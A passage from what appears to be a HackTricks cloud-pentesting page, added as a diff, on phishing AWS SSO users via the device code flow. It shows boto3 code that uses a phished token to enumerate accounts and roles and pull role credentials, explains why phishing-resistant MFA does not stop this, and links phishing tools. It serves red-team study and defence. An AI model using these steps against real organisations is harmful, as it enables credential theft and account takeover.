+        maxResults=100
+)
+aws_accounts_response.get('accountList', [])
+
+# Get roles inside an account
+roles_response = sso_client.list_account_roles(
+        accessToken=sso_token,
+        accountId=<account_id>
+)
+roles_response.get('roleList', [])
+
+# Get credentials over a role
+
+sts_creds = sso_client.get_role_credentials(
+        accessToken=sso_token,
+        roleName=<role_name>,
+        accountId=<account_id>
+)
+sts_creds.get('roleCredentials')
+```
+
+### Phishing the unphisable MFA
+
+It's fun to know that the previous attack **works even if an "unphisable MFA" (webAuth) is being used**. This is because the previous **workflow never leaves the used OAuth domain**. Not like in other phishing attacks where the user needs to supplant the login domain, in the case the device code workflow is prepared so a **code is known by a device** and the user can login even in a different machine. If accepted the prompt, the device, just by **knowing the initial code**, is going to be able to **retrieve credentials** for the user.
+
+For more info about this [**check this post**](https://mjg59.dreamwidth.org/62175.html).
+
+### Automatic Tools
+
+* [https://github.com/christophetd/aws-sso-device-code-authentication](https://github.com/christophetd/aws-sso-device-code-authentication)
+* [https://github.com/sebastian-mora/awsssome\_phish](https://github.com/sebastian-mora/awsssome\_phish)
+
+## References
+
+* [https://blog.christophetd.fr/phishing-for-aws-credentials-via-aws-sso-device-code-authentication/](https://blog.christophetd.fr/phishing-for-aws-credentials-via-aws-sso-device-code-authentication/)
+* [https://ruse.tech/blogs/aws-sso-phishing](https://ruse.tech/blogs/aws-sso-phishing)
+* [https://mjg59.dreamwidth.org/62175.html](https://mjg59.dreamwidth.org/62175.html)
+* [https://ramimac.me/aws-device-auth](https://ramimac.me/aws-device-auth)
+
+<details>
+
+<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
+
+Other ways to support HackTricks:
+
+* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
+* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>